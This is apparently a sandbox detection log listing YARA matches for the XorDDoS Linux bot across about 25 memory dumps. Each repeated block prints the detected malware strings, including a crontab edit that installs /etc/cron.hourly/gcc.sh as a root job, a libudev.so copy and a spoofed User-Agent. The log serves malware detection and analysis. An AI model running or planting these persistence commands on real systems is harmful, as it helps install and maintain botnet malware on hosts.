6264.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6264.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6446.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6446.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6446.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6446.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6549.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6549.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6549.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6549.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6581.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6581.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6581.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6581.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6425.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6425.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6425.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6425.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6528.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6528.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6528.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6528.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6314.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6314.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6314.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6314.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6570.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6570.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6570.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6570.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6471.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6471.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6471.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6471.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6505.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6505.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6505.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6505.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6443.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6443.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6443.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6443.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6405.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6405.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6405.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6405.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6598.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6598.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6598.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6598.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6587.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6587.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6587.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6587.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6438.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6438.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6438.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6438.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6547.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6547.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6547.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6547.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6463.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6463.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6463.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6463.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6328.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6328.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6328.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6328.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6542.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6542.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6542.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6542.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6452.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6452.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6452.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6452.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6596.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6596.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6596.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6596.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6293.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6293.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6293.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6293.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
6476.1.0000000008048000.00000000080cd000.r-x.sdmp	JoeSecurity_XorDDoS	Yara detected XorDDoS Bot	Joe Security
6476.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_2aef46a6	unknown	unknown	0x69998:$a: 25 64 2D 2D 25 73 5F 25 64 3A 25 73
6476.1.0000000008048000.00000000080cd000.r-x.sdmp	Linux_Trojan_Xorddos_884cab60	unknown	unknown	0x79d2:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1 0x7a3a:$a: E4 8B 51 64 F6 C2 10 75 12 89 CB 89 D1 83 C9 40 89 D0 F0 0F B1
6476.1.0000000008048000.00000000080cd000.r-x.sdmp	MALWARE_Linux_XORDDoS	Detects XORDDoS	ditekSHen	0x84cfb:$s1: for i in `cat /proc/net/dev\|grep :\|awk -F: {'print $1'}`; do ifconfig $i up& done 0x84d4d:$s2: cp /lib/libudev.so /lib/libudev.so.6 0x696f8:$s3: sed -i '/\/etc\/cron.hourly\/gcc.sh/d' /etc/crontab && echo '/3 * * * root /etc/cron.hourly/gcc.sh' >> /etc/crontab 0x698a9:$s4: User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.2; SV1; TencentTraveler ; .NET CLR 1.1.4322)
